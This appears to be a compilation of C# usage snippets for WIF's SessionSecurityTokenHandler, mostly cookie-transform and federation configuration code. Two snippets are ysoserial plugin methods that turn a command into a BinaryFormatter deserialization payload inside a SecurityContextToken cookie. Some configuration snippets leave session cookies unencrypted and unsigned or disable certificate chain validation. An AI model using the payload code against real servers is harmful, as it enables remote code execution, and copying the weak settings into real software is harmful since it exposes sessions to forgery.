private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { var sessionTransforms = new List <CookieTransform>(new CookieTransform[] { new DeflateCookieTransform() }); var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
void WriteSessionToken(XmlWriter writer, SessionSecurityToken sessionToken) { SessionSecurityTokenHandler ssth = GetOrCreateSessionSecurityTokenHandler(); XmlDictionaryWriter dictionaryWriter = XmlDictionaryWriter.CreateDictionaryWriter(writer); ssth.WriteToken(dictionaryWriter, sessionToken); }
public object Run(string[] args) { List <string> extra; try { extra = options.Parse(args); } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial --help' for more information."); System.Environment.Exit(-1); } String payloadValue = ""; string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'> <Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> urn:unique-id:securitycontext:1337 </Identifier> <Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie> </SecurityContextToken>"; if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial --help' for more information."); System.Environment.Exit(-1); } byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false); DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform(); ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform(); byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData); byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded); payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded)); if (test) { // PoC on how it works in practice try { XmlReader tokenXML = XmlReader.Create(new StringReader(payload)); SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler(); mySessionSecurityTokenHandler.ReadToken(tokenXML); } catch (Exception e) { // there will be an error! } } return(payload); }
public IClaimsSetupContext MakeClaimsAware <T>(SessionSecurityTokenHandler tokenHandler = null) where T : ClaimsAuthenticationManager { if (PassiveFederationInitialized) { throw new InvalidOperationException("Application is already made claims aware"); } Application.ConfigurePassiveFederation <T>(tokenHandler); PassiveFederationInitialized = true; return(this); }
public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { List<CookieTransform> sessionTransforms = new List<CookieTransform>(new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { List <CookieTransform> sessionTransforms = new List <CookieTransform>(new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
/// <summary> /// The lifetime of the session is defaulted unless provided by the SessionSecurityTokenHandler. /// </summary> TimeSpan GetSessionLifetime() { TimeSpan lifetime = SessionSecurityTokenHandler.DefaultTokenLifetime; SessionSecurityTokenHandler ssth = _serviceConfiguration.SecurityTokenHandlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler; if (ssth != null) { lifetime = ssth.TokenLifetime; } return(lifetime); }
private static SessionSecurityTokenHandler GetOrCreateSessionSecurityTokenHandler() { SecurityTokenHandlerCollection defaultHandlers = SecurityTokenHandlerCollection.CreateDefaultSecurityTokenHandlerCollection(); SessionSecurityTokenHandler ssth = defaultHandlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler; if (ssth == null) { ssth = new SessionSecurityTokenHandler(); defaultHandlers.AddOrReplace(ssth); } return(ssth); }
void OnServiceConfigurationCreated(object sender, FederationConfigurationCreatedEventArgs e) { // Change cookie encryption type from DPAPI to RSA. This avoids a security exception due to a cookie size limit with the SSO cookie. See http://fabriccontroller.net/blog/posts/key-not-valid-for-use-in-specified-state-exception-when-working-with-the-access-control-service/ var sessionTransforms = new List <CookieTransform>(new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.FederationConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.FederationConfiguration.ServiceCertificate) }); var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.FederationConfiguration.IdentityConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { // Use the <serviceCertificate> to protect the cookies that are sent to the client List<CookieTransform> sessionTransforms = new List<CookieTransform>( new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { // Use the <serviceCertificate> to protect the cookies that are sent to the client List <CookieTransform> sessionTransforms = new List <CookieTransform>( new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
/// <summary> /// Helper method to setup the WrappedSecureConversttion /// </summary> SecurityTokenAuthenticator SetupSecureConversationWrapper(RecipientServiceModelSecurityTokenRequirement tokenRequirement, SessionSecurityTokenHandler tokenHandler, out SecurityTokenResolver outOfBandTokenResolver) { // This code requires Orcas SP1 to compile. // WCF expects this securityTokenAuthenticator to support: // 1. IIssuanceSecurityTokenAuthenticator // 2. ICommunicationObject is needed for this to work right. // WCF opens a listener in this STA that handles the nego and uses an internal class for negotiating the // the bootstrap tokens. We want to handle ValidateToken to return our authorization policies and surface the bootstrap tokens. // when sp1 is installed, use this one. //SecurityTokenAuthenticator sta = base.CreateSecureConversationTokenAuthenticator( tokenRequirement as RecipientServiceModelSecurityTokenRequirement, _saveBootstrapTokensInSession, out outOfBandTokenResolver ); // use this code if SP1 is not installed SecurityTokenAuthenticator sta = base.CreateSecurityTokenAuthenticator(tokenRequirement, out outOfBandTokenResolver); SessionSecurityTokenHandler sessionTokenHandler = tokenHandler; // // If there is no SCT handler here, create one. // if (tokenHandler == null) { sessionTokenHandler = new SessionSecurityTokenHandler(_cookieTransforms, SessionSecurityTokenHandler.DefaultTokenLifetime); sessionTokenHandler.ContainingCollection = _securityTokenHandlerCollection; sessionTokenHandler.Configuration = _securityTokenHandlerCollection.Configuration; } if (ServiceCredentials != null) { sessionTokenHandler.Configuration.MaxClockSkew = ServiceCredentials.IdentityConfiguration.MaxClockSkew; } SctClaimsHandler claimsHandler = new SctClaimsHandler( _securityTokenHandlerCollection, GetNormalizedEndpointId(tokenRequirement)); WrappedSessionSecurityTokenAuthenticator wssta = new WrappedSessionSecurityTokenAuthenticator(sessionTokenHandler, sta, claimsHandler, _exceptionMapper); WrappedTokenCache wrappedTokenCache = new WrappedTokenCache(_tokenCache, claimsHandler); SetWrappedTokenCache(wrappedTokenCache, sta, wssta, claimsHandler); outOfBandTokenResolver = wrappedTokenCache; return(wssta); }
/// <summary> /// Initializes an instance of <see cref="WrappedRsaSecurityTokenAuthenticator"/> /// </summary> /// <param name="sessionTokenHandler">The sessionTokenHandler to wrap</param> /// <param name="wcfSessionAuthenticator">The wcf SessionTokenAuthenticator.</param> /// <param name="sctClaimsHandler">Handler that converts WCF generated IAuthorizationPolicy to <see cref="AuthorizationPolicy"/></param> /// <param name="exceptionMapper">Converts token validation exception to SOAP faults.</param> public WrappedSessionSecurityTokenAuthenticator(SessionSecurityTokenHandler sessionTokenHandler, SecurityTokenAuthenticator wcfSessionAuthenticator, SctClaimsHandler sctClaimsHandler, ExceptionMapper exceptionMapper) : base() { if (sessionTokenHandler == null) { throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sessionTokenHandler"); } if (wcfSessionAuthenticator == null) { throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("wcfSessionAuthenticator"); } if (sctClaimsHandler == null) { throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sctClaimsHandler"); } if (exceptionMapper == null) { throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("exceptionMapper"); } _issuanceSecurityTokenAuthenticator = wcfSessionAuthenticator as IIssuanceSecurityTokenAuthenticator; if (_issuanceSecurityTokenAuthenticator == null) { throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4244)); } _communicationObject = wcfSessionAuthenticator as ICommunicationObject; if (_communicationObject == null) { throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4245)); } _sessionTokenHandler = sessionTokenHandler; _sctClaimsHandler = sctClaimsHandler; _exceptionMapper = exceptionMapper; }
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { if (e.ServiceConfiguration.ServiceCertificate == null) { throw new ApplicationException("No site certificate; is it set up in web.config?"); // Make sure you've got the service certificate set up in the web.config: // <serviceCertificate> // <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" /> // </serviceCertificate> } List<CookieTransform> sessionTransforms = new List<CookieTransform>(new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
void ChangeTokenHandler(SessionSecurityTokenHandler tokenHandler, IdentityConfiguration identitySettings) { var itemTOremove = (from i in identitySettings.SecurityTokenHandlers where i.GetType().Implements <SessionSecurityTokenHandler>() || i is SessionSecurityTokenHandler select i).SingleOrDefault(); if (itemTOremove.IsInstance()) { identitySettings.SecurityTokenHandlers.Remove(itemTOremove); } if (tokenHandler.IsInstance()) { identitySettings.SecurityTokenHandlers.Add(tokenHandler); } else { identitySettings.SecurityTokenHandlers.Add(new MachineKeySessionSecurityTokenHandler()); } Logging.DebugMessage("Configured Identity token handler"); }
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { if (e.ServiceConfiguration.ServiceCertificate == null) { throw new ApplicationException("No site certificate; is it set up in web.config?"); // Make sure you've got the service certificate set up in the web.config: // <serviceCertificate> // <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" /> // </serviceCertificate> } List <CookieTransform> sessionTransforms = new List <CookieTransform>(new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }
/// <summary> /// On Service Configuration Created /// </summary> /// <param name="sender">Sender</param> /// <param name="e">Service Configuration Created Event Args</param> private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { using (new PerformanceMonitor()) { try { var sessionTransforms = new List <CookieTransform>(new CookieTransform[] { new DeflateCookieTransform(), new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate), new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate) }); var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); } catch (ArgumentNullException aex) { logger.Log(aex, EventTypes.Error, (int)Fault.CertificateNotSpecified); } } }
public object Run(string[] args) { InputArgs inputArgs = new InputArgs(); List <string> extra; try { extra = options.Parse(args); inputArgs.CmdFullString = command; inputArgs.Minify = minify; inputArgs.UseSimpleType = useSimpleType; inputArgs.Test = test; } catch (OptionException e) { Console.Write("ysoserial: "); Console.WriteLine(e.Message); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } String payloadValue = ""; string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> <Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> urn:unique-id:securitycontext:1 </Identifier> <Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie> </SecurityContextToken>"; if (minify) { payload = XMLMinifier.Minify(payload, null, null); } if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command)) { Console.Write("ysoserial: "); Console.WriteLine("Incorrect plugin mode/arguments combination"); Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information."); System.Environment.Exit(-1); } byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs); DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform(); ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform(); byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData); byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded); payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded)); if (test) { // PoC on how it works in practice try { XmlReader tokenXML = XmlReader.Create(new StringReader(payload)); SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler(); mySessionSecurityTokenHandler.ReadToken(tokenXML); } catch { // there will be an error! } } if (minify) { payload = XMLMinifier.Minify(payload, null, null); } return(payload); }
public static void ConfigurePassiveFederation <TAuth, TCache>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler) where TAuth : ClaimsAuthenticationManager where TCache : SessionSecurityTokenCache { if (WebServerConfiguration.IsConfiguredAsWebFront) { Logging.DebugMessage("Stardust web requirements configured"); } lock (Triowing) { AuthorizationManager = typeof(TAuth); CahceModule = typeof(TCache); } Logging.DebugMessage("Managers added to initializer"); application.ConfigurePassiveFederation(tokenHandler); }
public static void ConfigurePassiveFederation <T>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler) where T : ClaimsAuthenticationManager { Logging.DebugMessage("Initializing Stardust..."); SetClaimsManager <T>(); Logging.DebugMessage("Claims manager set"); application.ConfigurePassiveFederation(tokenHandler); }
public static void ConfigurePassiveFederation(this HttpApplication application, SessionSecurityTokenHandler tokenHandler) { using (ContainerFactory.Current.ExtendScope(Scope.Context)) { Logging.DebugMessage("Initializing Runtime"); var runtime = CreateRuntime(); Logging.DebugMessage("Runtime initialized"); var settings = GetSettings(runtime); Logging.DebugMessage("Settings obtained"); var rootUrl = GetRootUrl(runtime); Logging.DebugMessage("Root url obtained"); DisableChainValidation(settings); Logging.DebugMessage("Chain validation set"); ConfigureIdentitySettings(settings, rootUrl, tokenHandler); Logging.DebugMessage("Identity settins configured"); AddAudience(settings, rootUrl); Logging.DebugMessage("Audience added"); if (!FederatedAuthentication.FederationConfiguration.IsInitialized) { FederatedAuthentication.FederationConfiguration.Initialize(); Logging.DebugMessage("Federated authentication initialized"); } Logging.DebugMessage("Configuration completed"); } }
private static void ConfigureIdentitySettings(IdentitySettings settings, string rootUrl, SessionSecurityTokenHandler tokenHandler) { GetStsSettingsFromEnvironment(settings); var identitySettings = ConfigureWithExternalModules(); SetIssuer(settings, identitySettings); SetCertificateValidationMode(settings, identitySettings); ChangeTokenHandler(tokenHandler, identitySettings); ConfigureFederationSettings(settings, rootUrl); if (FederatedAuthentication.SessionAuthenticationModule.IsInstance()) { FederatedAuthentication.SessionAuthenticationModule.IsReferenceMode = true; } ThumbprintResolver.RegisterWeb(identitySettings); }
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e) { var sessionTransforms = new List<CookieTransform>(new CookieTransform[] { new DeflateCookieTransform() }); var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly()); e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler); }